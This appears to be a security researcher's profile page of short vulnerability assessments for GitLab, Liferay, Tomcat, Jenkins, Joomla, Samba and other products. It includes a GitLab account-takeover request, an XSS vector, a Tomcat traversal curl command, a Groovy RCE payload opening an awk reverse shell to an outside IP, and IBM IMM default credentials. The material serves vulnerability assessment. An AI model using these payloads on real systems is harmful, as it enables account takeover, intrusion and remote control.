noraj (98)
Last Login: January 25, 2024
noraj's Latest (20) Contributions
Technical Analysis
Tested on Gitlab CE 16.6.1. Very effective and easy to exploit. In the following payload the brackets MUST be URL encoded, else it won’t work: user[email][]=victim@example.org&user[email][]=attacker@example.org
.
POST /users/password HTTP/2 Host: gitlab.example.org ... authenticity_token=<auto_generated_token>&user%5Bemail%5D%5B%5D=victim%40example.org&user%5Bemail%5D%5B%5D=attacker%40example.org
Note that you must know the email address and not the login name.
See here for vulnerable and patched versions.
Technical Analysis
This can be used to recover secret information (Qr codes, passwords, etc.) from a cropped image with Microsoft Windows snipping tool abusing the Acropalypse vulnerability.
There are some limitations:
- Useful only if the cropped information is sensitive
- Limited to the vulnerable screenshot software
- Must be cropped
- Patched by Microsoft
Technical Analysis
Additional information by the reporter at https://liferay.atlassian.net/browse/LPE-17093
Steps to reproduce
- Start vanilla 7.0.x/7.1x/7.2.x
- create a site team with title:
<b onmouseover=alert(document.location)>Test</b>
- Click into the Team
- click + to add new member
- In the popup, hover onto ‘Test’ in the title: “Add New User to Test”
Actual result: XSS popup
Expected: no XSS
Reproduced on: (x) 7.0.x Commit: f0ea5eb8945bd8bd20736d6aff0a5a6e748f5051 (x) 7.2.x Commit: 774c13baf1149336f7011318c0766e1dd0c4270f|https://github.com/liferay/liferay-portal/commit/774c13baf1149336f7011318c0766e1dd0c4270f master private Commit: c379f2a0f2204cf2ded7688e367ef69d72919485
Technical Analysis
Additional information added by the discoverer at https://liferay.atlassian.net/browse/LPE-17022
Steps to reproduce:
- Create a Web Content Folder Folder1
- Configure Folder1 with Workflow Single Approver
- Create a Web Content WC1 in Folder1
- Go to Notifications
- Copy the link of the new notification.
- Replace the value of the redirect parameter with http%3A%2F%2Fwww.liferay.com
Expected result:
- The user is not redirected to a page within [https://www.liferay.com|https://www.liferay.com/]
Actual result:
- The user is redirected to a page with [https://www.liferay.com|https://www.liferay.com/]
Technical Analysis
The XXE is in a function (Xml::parse
) that is part of the core library but is not used directly in the CMS. So to be vulnerable, one has to have made a custom page or installed an extension using this vulnerable function.
Else it’s pretty handy and is present in nearly all versions of the CMS until the patch.
Technical Analysis
The version of Dell EMC iDRAC8 or Dell EMC iDRAC9 prior to 2.83.83.83/5.10.30.00 are vulnerable to this. Dell advisory.
Technical Analysis
It should be easy to exploit but there is no known public exploit.
Technical Analysis
It’s hard to find a SH4 architecture gcc compilation toolchain outside of debian / ubuntu. Cross compilation make it uneasy to compile the payload.
Technical Analysis
Useful to access to Tomcat manager that is normally exposed only on localhost, eg.
curl http://example.org/..\;/manager/html --path-as-is
Technical Analysis
It’s easy to weaponize, even manually but there are dozens of exploits available. There is a TryHackMe room about CVE-2022-26134 to practice in a lab environment.
Technical Analysis
Despite the CVE being registered for Wordpress, fckeditor is embedded in many CMS or custom applications and as such can impact more applications. However, fckeditor provides connectors for ASP, PHP, etc. but not JSP for example. So a Java app using fckeditor may be not vulnerable even with a vulnerable fckeditor.
Technical Analysis
There are at least two ways to achieve RCE.
Vector n°1
It leaks the MySQL credentials, in default and most common configurations MySQL will be exposed only on 127.0.0.1
which make the attack ineffective. But if the database is exposed publicly, the attacker can change the Joomla! Super User’s password. The attacker logs in administrative web interface and modify a template to include a webshell or install a malicious plugin.
Vector n°2
It leaks the Joomla user database (usernames, emails, assigned group). The attacker can target a Super user and try bruteforce or credentials stuffing, then follows previously showcased paths to code execution.
Technical Analysis
It has been proven working well on production domains (cf. https://twitter.com/an0n_r0/status/1589405818885398528). kpasswd support is being implemented in impacket and the vuln will be exploitable with ticketer.
Note : this vulnerability concerns Samba AD and not MS AD.
Technical Analysis
This vulnerability is old now and targets old version of Rails. But if you face such an app it’s really easy to get RCE using an existing PoC. However, editing the YAML manually can be difficult because it’s very space sensitive.
Technical Analysis
It’s easy to get RCE with a Groovy payload. Your code will be executed even if you receive an HTTP 500 error.
Example of request / payload:
POST /createItem?name=example HTTP/1.1 Host: example.org Content-Length: 689 Content-Type: application/xml; Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close <map> <entry> <groovy.util.Expando> <expandoProperties> <entry> <string>hashCode</string> <org.codehaus.groovy.runtime.MethodClosure> <delegate class="groovy.util.Expando"/> <owner class="java.lang.ProcessBuilder"> <command> <string>awk</string> <string>'BEGIN {s = "/inet/tcp/0/192.168.1.14/9999"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'</string> <string>/dev/null</string> </command> </owner> <method>start</method> </org.codehaus.groovy.runtime.MethodClosure> </entry> </expandoProperties> </groovy.util.Expando> <int>1</int> </entry> </map>
Technical Analysis
The only file you can rely on for detection is /WEB-INF/web.xml
, but to read something else you’ll have to know the directory structure which is unlikely when you audit a client infrastructure. To achieve RCE you’ll be required to get file upload which is also less likely. In many cases in real life it may end not useful outside proving the vulnerability exists.
There are still some chances you can read /RELEASE-NOTES.txt
if you don’t have another mean to know the version used.
If the application is deployed under an unguessable path it’s likely you won’t be able to go further but if you can reach to the app and browse it’ll may be able to understand paths and try to read the source code of the application.
Technical Analysis
IBM Integrated Management Module (IMM) have some default admin credentials (USERID
/ PASSW0RD
). The default credentials are working on the WebUI as well as on telnet and SSH that are accessible by default. The vulnerability allows to inject system commands. However the big tradeoff is that the exploit is not public.
Technical Analysis
It gives GLPI version, the list of all plugins and their version, and some system info like the database used and its version, sometimes the webserver engine, the PHP version and the list of all PHP modules loaded, the OS distro and version + the kernel name and version.